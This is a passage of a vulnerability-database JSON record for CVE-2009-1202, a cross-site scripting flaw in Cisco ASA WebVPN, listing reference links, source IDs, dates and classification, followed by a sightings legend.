        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1202"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/504516/100/0/threaded"
      },
      {
        "trust": 0.4,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18442"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/en/us/products/ps6120/index.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/504516"
      },
      {
        "trust": 0.2,
        "url": "http://www.cisco.com/pcgi-bin/tablebuild.pl/asapsirt"
      },
      {
        "trust": 0.1,
        "url": "http://www.trustwave.com\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1202"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com/spiderlabs"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1203"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1201"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com)"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com/spiderlabs/advisories/twsl2009-002.txt"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18536"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/35511/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=18373"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-06-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "date": "2009-06-24T00:00:00",
        "db": "BID",
        "id": "35480"
      },
      {
        "date": "2009-08-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "date": "2009-06-25T00:37:57",
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "date": "2009-07-01T09:39:17",
        "db": "PACKETSTORM",
        "id": "78856"
      },
      {
        "date": "2009-06-25T17:30:00.250000",
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "date": "2009-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "date": "2009-06-26T13:59:00",
        "db": "BID",
        "id": "35480"
      },
      {
        "date": "2009-08-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "date": "2018-10-10T19:35:07.870000",
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "date": "2009-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Adaptive Security Appliances (ASA) Device  WebVPN Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.7
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.